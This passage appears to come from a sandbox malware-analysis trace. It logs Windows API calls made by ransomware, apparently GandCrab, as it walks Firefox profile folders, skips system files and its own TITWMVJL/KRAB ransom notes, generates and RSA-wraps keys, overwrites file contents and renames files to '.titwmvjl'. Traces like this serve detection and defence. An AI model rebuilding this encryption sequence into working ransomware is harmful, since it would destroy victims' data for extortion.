"c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4.titwmvjl"), dwFlags=0x1) returned 1 [0081.513] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.513] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0081.513] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0081.513] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0081.513] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a09d2ca4deb61a.lock" [0081.513] lstrlenW (lpString=".titwmvjl") returned 9 [0081.513] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a09d2ca4deb61a.lock") returned 135 [0081.513] VirtualAlloc (lpAddress=0x0, dwSize=0x14e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0081.513] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 144 [0081.513] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a09d2ca4deb61a.lock") returned 135 [0081.513] lstrlenW (lpString=".lock") returned 5 [0081.513] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.513] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0081.513] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.514] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.514] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0081.514] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0081.514] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0081.514] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\TITWMVJL-DECRYPT.txt" [0081.514] lstrlenW (lpString=".titwmvjl") returned 9 [0081.514] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\TITWMVJL-DECRYPT.txt") returned 131 [0081.514] VirtualAlloc (lpAddress=0x0, dwSize=0x146, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0081.514] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 140 [0081.514] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\TITWMVJL-DECRYPT.txt") returned 131 [0081.514] lstrlenW (lpString=".txt") returned 4 [0081.514] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.514] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0081.514] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0081.514] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.515] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\TITWMVJL-DECRYPT.txt") returned 131 [0081.515] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\TITWMVJL-DECRYPT.txt") returned 131 [0081.515] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0081.515] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0081.515] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0081.515] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0081.515] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0081.515] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0081.515] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0081.515] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0081.515] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.515] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 0 [0081.515] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0081.516] CloseHandle (hObject=0x2e4) returned 1 [0081.516] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0081.516] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0081.516] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0081.516] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a09d2ca4deb61a.lock" [0081.516] lstrlenW (lpString=".titwmvjl") returned 9 [0081.516] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a09d2ca4deb61a.lock") returned 127 [0081.516] VirtualAlloc (lpAddress=0x0, dwSize=0x13e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0081.516] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 136 [0081.516] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a09d2ca4deb61a.lock") returned 127 [0081.517] lstrlenW (lpString=".lock") returned 5 [0081.517] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.517] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0081.517] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.517] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.517] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0081.517] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0081.517] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0081.517] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\TITWMVJL-DECRYPT.txt" [0081.517] lstrlenW (lpString=".titwmvjl") returned 9 [0081.517] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\TITWMVJL-DECRYPT.txt") returned 123 [0081.517] VirtualAlloc (lpAddress=0x0, dwSize=0x136, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0081.518] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 132 [0081.518] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\TITWMVJL-DECRYPT.txt") returned 123 [0081.518] lstrlenW (lpString=".txt") returned 4 [0081.518] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.518] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0081.518] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0081.518] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.518] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\TITWMVJL-DECRYPT.txt") returned 123 [0081.518] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\TITWMVJL-DECRYPT.txt") returned 123 [0081.518] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0081.518] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0081.518] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0081.518] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0081.518] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0081.518] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0081.518] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0081.518] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0081.518] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.518] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 0 [0081.519] FindClose (in: hFindFile=0x503838 | out: hFindFile=0x503838) returned 1 [0081.519] CloseHandle (hObject=0x2dc) returned 1 [0081.520] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0081.520] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0081.520] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0081.520] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\d2ca4a09d2ca4deb61a.lock" [0081.520] lstrlenW (lpString=".titwmvjl") returned 9 [0081.520] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\d2ca4a09d2ca4deb61a.lock") returned 118 [0081.520] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0081.520] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 127 [0081.520] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\d2ca4a09d2ca4deb61a.lock") returned 118 [0081.520] lstrlenW (lpString=".lock") returned 5 [0081.520] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.521] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0081.521] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.521] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.521] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0081.521] lstrcmpW (lpString1="session-state.json", lpString2=".") returned 1 [0081.521] lstrcmpW (lpString1="session-state.json", lpString2="..") returned 1 [0081.521] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\", lpString2="session-state.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json" [0081.521] lstrlenW (lpString=".titwmvjl") returned 9 [0081.521] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json") returned 112 [0081.521] VirtualAlloc (lpAddress=0x0, dwSize=0x120, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0081.522] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json.titwmvjl") returned 121 [0081.522] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json") returned 112 [0081.522] lstrlenW (lpString=".json") returned 5 [0081.522] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.522] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".json ") returned 6 [0081.522] lstrcmpiW (lpString1=".json", lpString2=".titwmvjl") returned -1 [0081.522] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.522] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json") returned 112 [0081.522] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json") returned 112 [0081.522] lstrcmpiW (lpString1="session-state.json", lpString2="desktop.ini") returned 1 [0081.522] lstrcmpiW (lpString1="session-state.json", lpString2="autorun.inf") returned 1 [0081.522] lstrcmpiW (lpString1="session-state.json", lpString2="ntuser.dat") returned 1 [0081.522] lstrcmpiW (lpString1="session-state.json", lpString2="iconcache.db") returned 1 [0081.522] lstrcmpiW (lpString1="session-state.json", lpString2="bootsect.bak") returned 1 [0081.522] lstrcmpiW (lpString1="session-state.json", lpString2="boot.ini") returned 1 [0081.522] lstrcmpiW (lpString1="session-state.json", lpString2="ntuser.dat.log") returned 1 [0081.522] lstrcmpiW (lpString1="session-state.json", lpString2="thumbs.db") returned -1 [0081.522] lstrcmpiW (lpString1="session-state.json", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0081.522] lstrcmpiW (lpString1="session-state.json", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0081.522] lstrcmpiW (lpString1="session-state.json", lpString2="KRAB-DECRYPT.html") returned 1 [0081.522] lstrcmpiW (lpString1="session-state.json", lpString2="CRAB-DECRYPT.html") returned 1 [0081.523] lstrcmpiW (lpString1="session-state.json", lpString2="KRAB-DECRYPT.txt") returned 1 [0081.523] lstrcmpiW (lpString1="session-state.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0081.523] lstrcmpiW (lpString1="session-state.json", lpString2="ntldr") returned 1 [0081.523] lstrcmpiW (lpString1="session-state.json", lpString2="NTDETECT.COM") returned 1 [0081.523] lstrcmpiW (lpString1="session-state.json", lpString2="Bootfont.bin") returned 1 [0081.523] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json") returned 112 [0081.523] lstrlenW (lpString=".json") returned 5 [0081.523] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.523] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".json ") returned 6 [0081.523] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.523] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.523] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\session-state.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0081.524] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0081.524] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.524] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4cdb38) returned 1 [0081.527] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.527] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.527] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.527] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0081.527] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.527] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.527] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.528] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.528] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4cdb38) returned 1 [0081.531] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.531] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.531] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.531] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0081.531] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.531] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.531] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.532] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.532] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4cdb38) returned 1 [0081.534] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.535] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x5039b8) returned 1 [0081.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.535] CryptGetKeyParam (in: hKey=0x5039b8, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0081.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.535] CryptEncrypt (in: hKey=0x5039b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0081.536] GetLastError () returned 0x0 [0081.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.536] CryptDestroyKey (hKey=0x5039b8) returned 1 [0081.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.536] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.536] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4cdb38) returned 1 [0081.539] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.539] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x5035b8) returned 1 [0081.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.540] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0081.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.540] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0081.540] GetLastError () returned 0x0 [0081.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.540] CryptDestroyKey (hKey=0x5035b8) returned 1 [0081.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.541] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.541] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0081.541] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0081.541] ReadFile (in: hFile=0x2dc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e4f8*=0x87, lpOverlapped=0x0) returned 1 [0081.958] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xffffff79, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.958] WriteFile (in: hFile=0x2dc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e4dc*=0x87, lpOverlapped=0x0) returned 1 [0081.968] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.968] WriteFile (in: hFile=0x2dc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0081.970] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.973] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.973] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.974] CloseHandle (hObject=0x2dc) returned 1 [0081.975] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\session-state.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\session-state.json.titwmvjl"), dwFlags=0x1) returned 1 [0081.976] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.976] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0081.976] lstrcmpW (lpString1="state.json", lpString2=".") returned 1 [0081.976] 